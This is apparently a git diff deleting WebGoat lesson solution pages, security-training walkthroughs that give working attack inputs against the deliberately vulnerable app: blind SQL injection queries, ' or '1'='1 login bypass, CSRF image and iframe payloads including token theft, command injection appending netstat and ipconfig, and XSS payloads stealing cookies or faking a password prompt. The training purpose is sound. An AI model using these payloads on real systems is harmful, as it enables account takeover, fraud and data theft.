-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-
-
-
General Goal(s):
-The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.
-
-The goal is to find the value of the field pin in table pins for the row with the cc_number of 1111222233334444. The field is of type int, which is an integer.
-
-Put the discovered pin value in the form to pass the lesson.
-
-
-Solution:
-In this lesson, the only output returned by the webpage is whether a given account exists or not. Therefore, we cannot simply request the pin number for this account.
-We can take advantage of the query being used, however. The database query being used is:
-SELECT * FROM user_data WHERE userid=accountNumber;
-If this query returns information for the account, the page will indicate the account exists. However, if the userid doesnt exist, no data is returned and the page says the account is invalid.
-By using the AND function, we can add additional conditions to this query. If the additional condition is true, the result will be a valid account, if not the page will indicate the account is invalid.
-For example, try entering these two commands for the account ID:
-101 AND 1=1 and 101 AND 1=2
-In the first statement, both conditions return true. Account 101 is found and 1=1, so the page indicates the account is valid.
-In the second statement, only the first condition is true. Account 101 is found but 1 does not equal 2, so the page indicates the account is invalid.
-Now, we can use a more complicated command for our second true/false statement. The following statement will tell us if the pin is above or below 10000:
-101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );
-If our command returns false, it makes the entire statement false and returns and invalid account, which indicates the pin number is below 10000. If it is above 10000, the opposite is true.
-The last step is to repeatedly use this command with a different number to the right of the > operator until we can determine the pin number.
-The pin number is 2364. Enter this number to complete the lesson.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/BlindStringSqlInjection.html b/src/main/webapp/lesson_solutions_1/BlindStringSqlInjection.html
deleted file mode 100644
index 844892b9d..000000000
--- a/src/main/webapp/lesson_solutions_1/BlindStringSqlInjection.html
+++ /dev/null
@@ -1,42 +0,0 @@
-
-
-
-
-Solution: Blind String SQL Injection
-
-
-
-
Lesson Plan Title: Blind String SQL Injection
-
-
Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-
-
-
General Goal(s):
-The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.
-
-The goal is to find the value of the field name in table pins for the row with the cc_number of 4321432143214321. The field is of type varchar, which is a string.
-
-Put the discovered name in the form to pass the lesson. Only the discovered name should be put into the form field, paying close attention to the spelling and capitalization.
-
-
-Solution:
-This lesson is conceptually very similar to the previous lesson. The big difference is we are searching for a string, not a number.
-We will attempt to figure out the name the same way, by injecting a boolean expression into the pre-scripted SQL query. It looks similar to the one from the previous lesson:
-101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' );
-We can compare characters the same way we can compare numbers. For example, N > M. However, without the SUBSTRING method, we are attempting to compare the entire string to one letter, which doesn't help us. The substring method has the following syntax:
-SUBSTRING(STRING,START,LENGTH)
-The expression above compares the first letter to H. It will return false and show invalid account number. Changing the boolean expression to < 'L' returns true, so we know the letter is between H and L. With a few more queries, we can determine the first letter is J. Note that capitalization matters, and it's right to assume the first letter is capitalized.
-To determine the second letter, we have to change the SUBSTRING parameters to compare against the second letter. We can use this command:
-101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'h' );
-Using several more queries, we can determine the second letter is i. Note that we are comparing the second character to a lowercase h. Continue this process until you have the rest of the letters.
-The name is Jill. Enter this name to complete the lesson. Capitalization matters.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/BypassHtmlFieldRestrictions.html b/src/main/webapp/lesson_solutions_1/BypassHtmlFieldRestrictions.html
deleted file mode 100644
index a0a7d4a84..000000000
--- a/src/main/webapp/lesson_solutions_1/BypassHtmlFieldRestrictions.html
+++ /dev/null
@@ -1,37 +0,0 @@
-
-
-
-
-Solution: Bypass HTML Field Restrictions
-
-
-
-
Lesson Plan Title: Bypass HTML Field Restrictions
-
-
Concept / Topic To Teach:
-Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application
-
-
-
General Goal(s):
-The user should be able send the website input that it wasn't expecting.
-For this exercise, your job is to break the client side validation and send the website input that it wasn't expecting, including input for the disabled field. You must break all 6 validators at the same time.
-
-
-Solution:
-To solve this lesson, we need to put invalid characters (slashes, quotes, etc.) into all six fields. Since three of the fields are toggles or dropdowns, we will need to intercept the request with Webscarab.
-We still need to put invalid data in the disabled field, however. There are two ways of accomplishing this; we can enable the field using Firebug, or we can insert an additional field using Webscarab.
-
-To enable the field, open Firebug and find the form containing all of our fields. Find the text input named "disabledinput". Delete the disabled="" parameter. This causes the field on the page to be unlocked, and will also cause the disabledinput variable to appear in Webscarab.
-
-Enabled input after removing the "disabled" parameter in Firebug.
-The other option is to add another variable when intercepting the request with Webscarab. When the intercept request window pops up, use the insert button to add a new variable called disabledinput.
-Either way you add the input, the next step is to invalidate all of the responses. Put any symbol or character that isn't allowed in for each variable. Make sure you put more than five characters in the field that is limited by length.
-
-
-Correctly filled in request with all fields invalidated and the disabledinput variable added.
-
-Submit the request to complete the lesson.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CSRF.html b/src/main/webapp/lesson_solutions_1/CSRF.html
deleted file mode 100644
index db3af3e8b..000000000
--- a/src/main/webapp/lesson_solutions_1/CSRF.html
+++ /dev/null
@@ -1,869 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform Cross Site Request Forgery.
-
-
-
-
Concept
-/ Topic To Teach:
-
-
This
-lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks.
-
-
-
-
How
-the attacks works:
-
-
Cross-Site
-Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a
-page that contains img links like the one below:
When
-the victim's browser attempts to render this page, it will issue a request to
-www.mybank.com to the transferFunds.do page with the specified parameters. The
-browser will think the link is to get an image, even though it actually is a
-funds transfer function. The request will include any cookies associated with
-the site. Therefore, if the user has authenticated to the site, and has either
-a permanent cookie or even a current session cookie, the site will have no way
-to distinguish this from a legitimate user request. In this way, the attacker
-can make the victim perform actions that they didn't intend to, such as logout,
-purchase item, or any other function provided by the vulnerable website
-
-
-
-
General
-Goal(s):
-
-
Your
-goal is to send an email to a newsgroup that contains an image whose URL is
-pointing to a malicious request. Try to include a 1x1 pixel image that includes
-a URL. The URL should point to the CSRF lesson with an extra parameter
-"transferFunds=4000". You can copy the shortcut from the left hand
-menu by right clicking on the left hand menu and choosing copy shortcut.
-Whoever receives this email and happens to be authenticated at that time will
-have his funds transferred. When you think the attack is successful, refresh
-the page and you will find the green check on the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
-
-
-
-
Figure 1 How to perform CSRF
-
-
-
-
Solution:
-
-
-
-
To
-complete this lesson you need to embed HTML code in the message box. This HTML
-code should contain a image tag linking to an URL that is not a real imagewill but start a transaction on the web
-server instead.
-
-
-
-
The
-format of an image in html is <img src="[URL]" width="1"
-height="1" />
-
-
The transaction can be triggered by an URL to the
-current lesson and an extra parameter "transferFunds" and the amount. The
-width=1 and height=1 will not show the image.
So create a new message with title "Test" and a
-message with the payload.
-
-
-
-
Figure 2 Insert payload
-
-
-
-
The page will refresh and you will see a new message
-in the message list.
-
-
-
-
-
-
Figure 3 New message test
-
-
-
-
Click
-on the message test. This will download the message and display the contents as
-HTML, executing the payload. Examine the HTTP Request in WebScarab that is
-generated when the browers tries to render the image tag.
-
-
-
-
-
-
Figure 4 CSRF attack
-
-
-
-
Now
-you need to refresh the page to get the green star next to the lesson.
Concept / Topic To Teach:
-It is always a good practice to send to the client
-only information which they are supposed to have access to.
-In this lesson, too much information is being sent to the
-client, creating a serious access control problem.
-
-
-
General Goal(s):
-For this exercise, your mission is exploit the extraneous
-information being returned by the server to discover information
-to which you should not have access.
-
-
-Solution:
-
-This Lab consists of two Stages. In the first Stage you have to
-get sensitive information . In the second one you have to fix the problem.
-
-Stage 1
-
-Use Firebug to solve this stage. If you are using IE you can try it with
-IEWatch.
-
-First use any person from the list and see what you get. After doing this you
-can search for a specific person in Firebug. Make sure you find the hidden table with
-the information, including the salary and so on. In the same table you will find
-Neville.
-
-
-Inspect HTML on Firebug
-
-
-Now write the salary into the text edit box and submit your answer!
-
-Stage 2
-
-In this stage you have to modify the clientSideFiltering.jsp which you will find under
-the WebContent in the lessons/Ajax folder. The Problem is that
-the server sends all information to the client. As you could see
-even if it is hidden it is easy to find the sensitive date. In this
-stage you will add a filter to the XPath queries. In this file you will find
-following construct:
-This string will be used for the XPath query. You have to guarantee that a manger only
-can see employees which are working for him. To archive this you can use
-filters in XPath. Following code will exactly do this:
-Now only information is sent to your client you are authorized for. You can click on the button.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/ClientSideValidation.html b/src/main/webapp/lesson_solutions_1/ClientSideValidation.html
deleted file mode 100644
index b23fb0875..000000000
--- a/src/main/webapp/lesson_solutions_1/ClientSideValidation.html
+++ /dev/null
@@ -1,64 +0,0 @@
-
-
-
-
-Insecure Client Storage
-
-
-
-
Lesson Plan Title: Insecure Client Storage
-
-
Concept / Topic To Teach:
-It is always a good practice to validate all input
- on the server side. Leaving the mechanism for validation
- on the client side leaves it vulnerable to reverse engineering.
- Remember, anything on the client side should not be considered a secret.
-
-
-
-
General Goal(s):
-For this exercise, your mission is to discover a coupon
-code to receive an unintended discount. Then, exploit the use
-of client side validation to submit an order with a cost of zero.
-
-
Solution:
-For the solution you need a plugin for your browser, which is capable of debugging
-Javascript. For IE you can use IEWatch. This solution is written for Firebug
-which is a plugin for Firefox.
-
-
-Stage 1
-
-First we want to try to get a coupon code to get something cheaper. Open
-Firebug and click on the Script Tab. Make sure you choose clientSideValidation.js
-on the dropdown list. Toggle a breakpoint on the line:
-decrypted = decrypt(coupons[i]);
-Now enter a character in the coupon code field. The Javascript gets executed
-but stops at the breakpoint. On the right side you see the parameters
-and there values. Now use the step over symbol or F10. Now you can read
-the clear text of decrypted:
-
-
-
-Figure 1 Firebug in action
-
-
-Now that you know the coupon name enter it in the coupon field, purchase something
-and you are done.
-
-
-Stage 2
-
-You can not edit the Prices in the Shopping Cart. The reason is that the readonly
-attribute is set for this field.
-
-
To get rid of this attribute open Firebug. Make sure this time you use
-the HTML View. You can directly in
-Firebug search for readonly and elemenate this attribute.The field for the total is
-called GRANDTOT. After having deleted the readonly attribute from GRANDTOT
-it is possible to change the price directly in the browser. Select any products
-you like, change the total field to 0 and hit the purchase button.
Lesson Plan Title: How to Perform Command Injection
-
-
-
-
Concept / Topic To Teach:
-
-
Command
-injection attacks represent a serious threat to any parameter-driven site. The methods
-behind an attack are easy to learn and the damage caused can range from
-considerable to complete system compromise. Despite these risks an incredible
-number of systems on the internet are susceptible to this form of attack.
-
-
-
-
Not only is
-it a threat easily instigated, it is also a threat that, with a little
-common-sense and forethought, can be almost totally prevented. This lesson will
-show the student several examples of parameter injection.
-
-
-
-
It is always
-good practice to sanitize all input data, especially data that will used in OS
-command, scripts, and database queries.
-
-
-
-
General Goal(s):
-
-
The user
-should be able to execute any command on the hosting OS.
-
-
-
-
-
-
Figure 1 Lesson 16
-
-
-
-
Solution:
-
-
-
-
Select a
-lesson from the drop-down box and click on "View".
-
-
-
-
-
-
-
-
Intercept the
-request with WebScarab when you click on "View". Append " & netstat -an
-& ipconfig to the HelpFile parameter. Do not forget the double quote!
-
-
-
-
-
-
Figure 2 Injecting command netstat & ipconfig
-
-
-
-
The result
-contains the output of the command netstat and ipconfig.
Concept / Topic To Teach:
-Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe. Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently.
-
-
-
General Goal(s):
-For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.
-
-
-Solution:
-1. Open a new browser window on the same page.
-2. In window A you choose a low cost item and click "Purchase".
-
-Window A
-3. In window B you choose the a high cost item you want to buy and click "update cart". The variable of the price has been overwritten now.
-
-Window B
-4. In window A you can click click "Confirm" and you bought your item for a lower price.
-
-Window A Success
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CsrfPromptByPass.html b/src/main/webapp/lesson_solutions_1/CsrfPromptByPass.html
deleted file mode 100644
index caeeedb03..000000000
--- a/src/main/webapp/lesson_solutions_1/CsrfPromptByPass.html
+++ /dev/null
@@ -1,110 +0,0 @@
-
-
-
-
-Client Side Filtering
-
-
-
-
Lesson Plan Title:Prompt By-Pass with CSRF
-
-
Concept / Topic To Teach:
-This lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks containing
-multiple requests to by-pass a scriptable user-prompt
-
-
-
General Goal(s):
-Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple
-malicious requests: the first to transfer funds, and the second a request to confirm the prompt
-that the first request triggered. The URL should point to this lesson with an extra
-parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the
-left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever
-receives this email and happens to be authenticated at that time will have his funds transferred.
-When you think the attack is successful, refresh the page and you will find the green check on
-the left hand side menu
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
-Solution:
-
-
Start by crafting an image or iframe tag similar to the CSRF LAB: <img
-src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
-width="1" height="1" />
-
-This image request will not result in a transfer of funds but will instead
-prompt the user for confirmation. To see the confirmation prompt, try typing in the URL of the
-Lesson with the extra parameter of "transferFunds=4000"
-
-
-User Prompt
-
-
-Next look at the source of the page to see what parameters the confirmation requires.
-The form in the confirmation prompt looks like the following:
-
-
-
-
-From this we see the next forged command will need the folllowing URL:
-attack?Screen=5&menu=900&transferFunds=CONFIRM
-This solution shows how to do this attack with both iframes and images. The next step is to
-add the additional forged confirmation request. However, an additional iframe or image with
-this URL will not be sufficient. The second request must load after the first. So add
-Javascript to load the second command after the first. For iframes, make the onload attribute
-of the first frame set the src of the second iframe:
-
-
-
-
-
-Next add the iframes into a message stored on the web page:
-
-Insert iframes hack picture
-
-The following shows the result of clicking on the malicious iframe message:
-
-Results of iframes hack picture
-In the above image, note that the first frame shows the user prompt, the result of the
-first forged request to transfer funds. In the second frame the results of the second
-forged request (the confirmation) are shown, indicating that 4000 dollars were successfully
-transfered. Refreshing the page will indicate that this lesson has been completed.
-
-
-In a real attack these results would be hidden from the end user. Click "restart this lesson"
-to attempt the attack again, only this time try hiding the attack with hidden or very small frames.
-
-
-For images, loading an html page as an image will cause an error. So instead of using the onload attribute, use onerror:
-
-
-<img
-src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
-onerror="document.getElementById('image2').src='http://localhostattack?Screen=81&menu=210&transferFunds=CONFIRM'"
-width="1" height="1" />
-<img
-id="image2"
-width="1" height="1" />
-
-
-Next store the malicious images in a message and click the message to attempt the attack.
-
-Picture of adding malicious image requests
-Refreshing the page should indicate that this lesson has been completed. Congratulations. One way for developers to limit
-CSRF attacks is to only allow requests to be issued via HTTP Post. That would remove any attacks by images or iframes, but
-not for XmlHttpRequests in Javascript. For extra credit, you could try the same attack but instead use XmlHttpRequest over post.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CsrfTokenByPass.html b/src/main/webapp/lesson_solutions_1/CsrfTokenByPass.html
deleted file mode 100644
index 1b66f2d72..000000000
--- a/src/main/webapp/lesson_solutions_1/CsrfTokenByPass.html
+++ /dev/null
@@ -1,122 +0,0 @@
-
-
-
-
-CSRF Token By-Pass
-
-
-
-
Lesson Plan Title:CSRF Token Prompt By-Pass
-
-
Concept / Topic To Teach:
-This lesson teaches how to perform CSRF attacks on sites that use tokens to mitigate CSRF attacks, but are vulnerable to CSS attacks.
-
-
-
-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into
-loading a page that contains a 'forged request' to execute commands with the
-victim's credentials.
-
-
Token-based request authentication deters these attacks. This technique
-inserts tokens into pages that issue requests. These tokens are required to
-complete a request, and help verify that requests are not scripted. CSRFGuard from OWASP uses
-this technique to help prevent CSRF attacks.
-
-
However, this technique can be by-passed if CSS vulnerabilities exist on the same site.
-Because of the same-origin browser policy, pages from the same domain can read content from
-other pages from the same domain.
-
-
General Goal(s):
-Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious
-request to transfer funds. To successfully complete you need to obtain a valid request token. The
-URL that presents the transfer funds form is the same as the CSRF lesson with an extra parameter
-"transferFunds=main". Load this page, read the token and append the token in a forged request
-to transferFunds. When you think the attack is successful, refresh the page and you will find the
-green check on the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
-Solution:
-
-
Similar to the CSRF LAB, you must forge a request that will transfer funds. However,
-a request will not result in a transfer of funds unless it has a correct token. To find
-a valid token, you could look at the form that the site generates to submit a transfer of funds.
-To see the transfer funds page, try typing in the URL of the Lesson with the extra parameter
-of "transferFunds=main"
-
-
-Transfer initiation form
-
-
-Next look at the source of the page to see what parameter the token comes in.
-
-
-
-From this we see a forged command will need the CSRFToken parameter.
-
-
This solution loads this page in an iframe and reads the token out of the frame.
-Note that this is possible because the message originates from the same domain and
-does not violate the "same origin policy". So even thought this page has taken
-measures to prevent CSRF attacks, those measures can be side-stepped because of
-CSS vulnerabilites. To pull out the CSRFToken, the following javascript locates the
-frame, then the form, then saves the token
-
-
-var tokenvalue;
-
-function readFrame1()
-{
- var frameDoc = document.getElementById("frame1").contentDocument;
- var form = frameDoc.getElementsByTagName("form")[1];
- var token = form.CSRFToken.value;
- tokenvalue = '&CSRFToken='+token;
-
- loadFrame2();
-}
-
-function loadFrame2()
-{
- var testFrame = document.getElementById("frame2");
- testFrame.src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;
-}
-
-
-
readFrame1 will read the frame's content for the CSRFToken, save it and then call loadFrame2
-LoadFrame2 will then append the token and load a second frame.
-
-The following frames loads the transfer page in the first frame. When it finishes loading, it will
-call readFrame1, which calls loadFrame2, which then sets the src for the second iframe.
-
-
-
-
-
-
The next picture shows inserting this code into a message:
-
-Inserting CSRF code into message
-
-The following picture shows the results of someone hitting this page. Note that no effort was taken to
-hide the results of the two frames. The first frame shows the transfer funds form, and the second shows
-the results of the CSRF attack. Try another post that will hide these iframes from being noticed.
-
The next picture shows inserting this code into a message:
-
-Results of viewing the malicious message
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/DOMInjection.html b/src/main/webapp/lesson_solutions_1/DOMInjection.html
deleted file mode 100644
index 1e73150f0..000000000
--- a/src/main/webapp/lesson_solutions_1/DOMInjection.html
+++ /dev/null
@@ -1,865 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform DOM Injection Attack.
-
-
-
-
Concept /
-Topic To Teach:
-
-
How to
-perform DOM injection attacks.
-
-
-
-
How the
-attacks works:
-
-
Some applications
-specially the ones that uses AJAX manipulates and updates the DOM directly
-using JavaScript, DHTML and eval() method.
-An attacker may take advantage of that by intercepting the reply and try to
-inject some javascript commands to exploit his attacks.
-
-
-
-
General
-Goal(s):
-
-
*
-Your victim is a system that takes an activation key to allow you to use it.
-* Your goal should be to try to get to enable the activate button.
-* Take some time to see the HTML source in order to understand how the key
-validation process works.
-
-
-
-
-
-
Figure 1 AJAX Security - DOM Injection
-
-
-
-
Solution:
-
-
-
-
AJAX requires
-XML communication between the browser and the web application. When you view
-the source of the HTML page, you will notice the usage of XMLHttpRequest:
-
-
-
-
<script>
-
-
function
-validate() {
-
-
var keyField
-= document.getElementById('key');
-
-
var url =
-'attack?Screen=80&menu=1150&from=ajax&key=' +
-encodeURIComponent(keyField.value);
-
-
if (typeof
-XMLHttpRequest != 'undefined') {
-
-
req
-= new XMLHttpRequest();
-
-
} else if
-(window.ActiveXObject) {
-
-
req
-= new ActiveXObject('Microsoft.XMLHTTP');
-
-
}
-
-
req.open('GET', url, true);
-
-
req.onreadystatechange = callback;
-
-
req.send(null);
-
-
}
-
-
function
-callback() {
-
-
if (req.readyState == 4) {
-
-
if (req.status == 200) {
-
-
var message = req.responseText;
-
-
eval(message);
-
-
}}}
-
-
</script>
-
-
-
-
The XML
-response contains JavaScript that will activate the button so that you are able
-to click on it. This requires you to inject JavaScript to manipulate the
-Document Object Model of the HTML page in the browser. This requires
-intercepting the HTTP response in WebScarab!
-
-
-
-
Enter a
-license key (for example 'a') and intercept the HTTP Request and HTTP Response
-in WebScarab.
-
-
-
-
-
-
Figure 2 HTTP Request
-
-
-
-
-
-
Figure 3 HTTP Response
-
-
-
-
Intercept the
-reply and replace the body with document.form.SUBMIT.disabled = false;
Lesson Plan Title: DOM Based Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-The Document Object Model (DOM) presents an interesting problem from a security standpoint. It allows the content of a web page to be dynamically modified, but that can be abused by attackers during a malicious code injection. XSS, a type of malicious code injection, can occur when unvalidated user input is used directly to modify the content of a page on the client side.
-
-
-
General Goal(s):
-For this exercise, your mission is to use this vulnerability to inject malicious code into the DOM. Then in the last stage, you will correct the flaws in the code to address the vulnerability.
-
-
-Solution:
-Stage 1: Enter "<IMG SRC="images/logos/owasp.jpg"/>" and submit the solution.
-
-Stage 1 result
-Stage 2: Enter "<img src=x onerror=;;alert('XSS') />" and submit the solution.
-
-Stage 2 result
-Stage 3: Enter "<IFRAME SRC="javascript:alert('XSS');"></IFRAME>" and submit the solution.
-
-Stage 3 result
-Stage 4: Enter "Please enter your password:<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR> <BR><BR><BR><BR><BR><BR><BR><BR>" and submit the solution.
-
-Stage 4 result
-Stage 5: You have to use the JavaScript escape.js for the input.
-You will find the JavaScripts in tomcat\webapps\WebGoat\javascript ( Standart Version ) or in WebContent\javascript ( Developer Version ).
-Open the JavaScript DOMXSS.js
-function displayGreeting(name) {
- if (name != ''){
- document.getElementById("greeting").innerHTML="Hello, " + name + "!";
- }
-}
-
-You have to change this to:
-function displayGreeting(name) {
- if (name != ''){
- document.getElementById("greeting").innerHTML="Hello, " + escapeHTML(name); + "!";
- }
-}
-
-The attacks will no longer work.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/DOS_Login.html b/src/main/webapp/lesson_solutions_1/DOS_Login.html
deleted file mode 100644
index 575a3916f..000000000
--- a/src/main/webapp/lesson_solutions_1/DOS_Login.html
+++ /dev/null
@@ -1,704 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: Denial of
-Service from Multiple Logins
-
-
-
-
Concept /
-Topic To Teach:
-
-
Denial of
-service attacks are a major issue in web applications. If the end user cannot conduct
-business or perform the service offered by the web application, then both time
-and money is wasted.
-
-
-
-
General
-Goal(s):
-
-
This site
-allows a user to login multiple times. This site has a database connection pool
-that allows 2 connections. You must obtain a list of valid users and create a
-total of 3 logins.
-
-
Solution:
-
-
-
-
This site
-allows a user to login multiple times. There is a database connection pool that
-allows 2 connections. You must obtain a list of valid users and create a total
-of 3 logins.
-
-
-
-
Let's try a
-SQL Injection attack. Enter in the password field ' or '1' = '1
-
-
-
-
-
-
Figure 1 Lesson 20
-
-
-
-
Login with
-user name jsnow and password passwd1. Then login with user name jdoe and
-password passwd1. And finally login with jplane and passwd3.
Concept / Topic To Teach:
-It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is reflected directly into an HTTP response. In this lesson, unvalidated user-supplied data is used in conjunction with a Javascript eval() call. In a reflected XSS attack, an attacker can craft a URL with the attack script and store it on another website, email it, or otherwise trick a victim into clicking on it.
-
-
-
General Goal(s):
-For this exercise, your mission is to come up with some input which, when run through eval, will execute a malicious script. In order to pass this lesson, you must 'alert()' document.cookie.
-
-
-Solution:
-The value of the digit access code field is placed in the Javascript eval() function. This is the reason why your attack will not require the "<script>" tags.
-Enter: 123');alert(document.cookie);('
-The result on the server is:
- eval('123');
-alert(document.cookie);
-('');
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Encoding.html b/src/main/webapp/lesson_solutions_1/Encoding.html
deleted file mode 100644
index 08375aab2..000000000
--- a/src/main/webapp/lesson_solutions_1/Encoding.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
-
-
-Encoding Basics
-
-
-
-
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-Different encoding schemes can be used in web applications for different reasons.
-
-
-
General Goal(s):
-This lesson will familiarize the user with different encoding schemes.
-
-
-Solution:
-Enter the string "abc". In the List below you see the encoded value of the string. For rot13 encoding this is "nop". Now enter a string "a c" and have a look on the url encoding.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/FailOpenAuthentication.html b/src/main/webapp/lesson_solutions_1/FailOpenAuthentication.html
deleted file mode 100644
index a6d9b7a47..000000000
--- a/src/main/webapp/lesson_solutions_1/FailOpenAuthentication.html
+++ /dev/null
@@ -1,741 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Bypass a Fail Open
-Authentication Scheme
-
-
-
-
Concept / Topic To Teach: Abusing error handling.
-
-
-
-
This lesson presents
-the basics for understanding the "fail open" condition regarding
-authentication. The security term, "fail open" describes a behavior of a
-verification mechanism. This is when an error (i.e. unexpected exception)
-occurs during a verification method causing that method to evaluate to true.
-This is especially dangerous during login.
-
-
-
-
General Goal(s):
-
-
The user
-should be able to bypass the authentication check.
-
-
-
-
-
-
Figure 1 Lesson 19
-
-
-
-
Solution:
-
-
-
-
Enter user
-name webgoat and click "Login". Intercept the request with WebScarab.
-
-
-
-
-
-
Figure 2 Intercepted request
-
-
-
-
Click on the
-variable "Password" and click "Delete". Click "Accept changes".
-
-
-
-
-
-
Figure 3 Password variable is deleted
-
-
-
-
You are now
-"authenticated" as WebGoat.
-
-
-
-
-
-
Figure 4 Lesson 19 Completed
-
-
-
-
The problem
-is that the exception handler in the Java code is executing a catch block for successful
-authentication. The exception occurs because there is a NullPointer exception
-when reading out the password parameter.
Lesson
-Plan Title: How to
-Perform Forced Browsing Attacks.
-
-
-
-
Concept
-/ Topic To Teach:
-
-
How
-to Exploit Forced Browsing.
-
-
-
-
How
-the attacks works:
-
-
Forced
-browsing is a technique used by attackers to gain access to resources that are
-not referenced, but are nevertheless accessible. One technique is to manipulate
-the URL in the browser by deleting sections from the end until an unprotected
-directory is found
-
-
-
-
General
-Goal(s):
-
-
Your
-goal should be to try to guess the URL for the "config" interface.
-The "config" URL is only available to the maintenance personnel.
-The application doesn't check for horizontal privileges.
If you want to access a restricted page, you need to
-be able to guess the URI to access the page, for example /admin.
-
-
In this environment, WebGoat consists of different
-servlets that live in the WebGoat application. The main servlet is /attack,
-what could be the servlet for config?
-
-
-
-
Try to access config,
-configuration, conf, ….
-
-
-
-
-
-
Figure 2 No config
-
-
-
-
-
-
Figure 3 No configuration
-
-
-
-
-
-
Figure 4 Bingo for conf
-
-
-
-
This
-could be automated with a tool like Wikto 2.0
Lesson
-Plan Title: How to
-Exploit the Forgot Password Page
-
-
-
-
Concept /
-Topic To Teach:
-
-
-
-
Web
-applications frequently provide their users the ability to retrieve a forgotten
-password. Unfortunately, many web applications fail to implement the mechanism
-properly. The information required to verify the identity of the user is often
-overly simplistic.
-
-
-
-
General
-Goal(s):
-
-
Users can
-retrieve their password if they can answer the secret question properly. There
-is no lock-out mechanism on this 'Forgot Password' page. Your username is
-'webgoat' and your favorite color is 'red'. The goal is to retrieve the
-password of another user.
-
-
-
-
Solution:
-
-
-
-
This lesson
-will show you how easy it is to guess a secret question and retrieve somebody
-else his password.
-
-
-
-
-
-
Figure 1 Lesson 10
-
-
-
-
When you
-enter the user name webgoat and then the answer "red" for your favorite color,
-you will get a password reminder, only not via e-mail.
-
-
-
-
-
-
Figure 2 Submit the answer red
-
-
-
-
-
-
Figure 3 Password reminder for user webgoat
-
-
-
-
The password
-for user webgoat is webgoat. This is a weak password policy, which is also a
-bad thing J
-
-
-
-
Now you need
-to guess the password for another user. The text tells you something about an
-"OWASP admin". So let’s try "admin" for a user name.
-
-
-
-
-
-
Figure 4 Is there a user admin?
-
-
-
-
This works.
-Now you need the guess some colors.
-
-
-
-
-
-
Figure 5 There is a user admin!
-
-
-
-
-
-
Try blue, red
-and green for example.
-
-
-
-
-
-
Figure 6 No blue
-
-
-
-
Blue is an
-incorrect response.
-
-
-
-
-
-
Figure 7 It's green!
-
-
-
-
Green is the
